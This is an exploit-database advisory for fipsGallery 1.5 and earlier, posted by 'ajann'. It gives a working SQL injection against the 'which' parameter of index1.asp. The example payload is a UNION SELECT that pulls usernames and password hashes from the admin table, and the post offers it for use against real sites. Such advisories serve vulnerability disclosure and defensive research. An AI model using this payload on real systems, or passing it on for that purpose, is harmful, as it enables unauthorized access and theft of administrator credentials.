id: 1193
date: 11/22/2006
title: fipsGallery <= 1.5 (index1.asp) Remote SQL Injection Vulnerability
author: ajann
cves: 

==================================================================
fipsGallery <= 1.5 (index1.asp) Remote SQL Injection Vulnerability
==================================================================



*******************************************************************************
# Title   :  fipsGallery <= v1.5 (index1.asp) Remote SQL Injection Vulnerability
# Author  :   ajann
# Contact :   :(
# $$$     :   29 Euro


*******************************************************************************

###http://[target]/[path]//index1.asp?what=artists&which=[SQL]

Example:

//index1.asp?what=artists&which=-1%20union%20select%200,username,password%20from%20admin

See you Admin Hash..

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!



#  0day.today [2023-03-21]  #